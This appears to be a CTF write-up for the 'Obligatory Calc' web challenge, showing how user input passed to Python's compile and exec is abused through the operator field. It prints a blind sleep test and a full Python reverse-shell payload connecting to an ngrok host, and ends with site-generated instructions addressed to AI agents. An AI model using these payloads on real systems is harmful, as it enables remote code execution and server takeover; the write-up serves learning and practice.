# Obligatory Calc

| Difficulty | Points | Solves |
| ---------- | ------ | ------ |
| Easy       | 147    | 10     |

## Description

> In every CTF that I've seen \
> There's always a calculator routine \
> It tests our skills and our wit \
> To solve it, we must not quit\
> \
> Poem by ChatGPT

The web application receives user input from a POST request, then uses the `compile` function to generate a code object from the string that represent the arithmetic operation.

<figure><img src="/files/0DxP5dzteT1gZzNwZtvM" alt=""><figcaption></figcaption></figure>

The code object is then executed using the **`exec`** function, and the result is stored in a dictionary called `msg`.

The web application is using the **`compile`** and **`exec`** functions to dynamically generate and execute code based on user input, which could be exploited by an attacker to inject malicious code and execute it.

## Exploiting the vulnerability

Using burpsuite, I intercepted the request and send it to repeater using `Ctrl + R`

<figure><img src="/files/YjOvCKjVzZgQTIp9gLCV" alt=""><figcaption></figcaption></figure>

Next, I modify the `int1=1&operator=%2B&int2=1` to a payload to perform blind code execution

```
int1=1&operator=*__import__('os').system('python -c "import time;time.sleep(5)"')#&int2=1
```

The web application will sleep for 5 second before returning `0` suggesting that the blind code execution works

![](/files/X5ifxNxnidAt38OBGI6c)

Modify the payload to a standard python reverse shell

```
int1=1&operator=*__import__('os').system('''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.ngrok.io",18531));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''')#&int2=1
```

We have successfully shelled the server and gotten the flag.

<figure><img src="/files/dR4rbEJqqzK8kVYfEKN6" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kabinet.gitbook.io/ctf-writeup/authored/nyp-infosec-december-ctf-2022/obligatory-calc.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.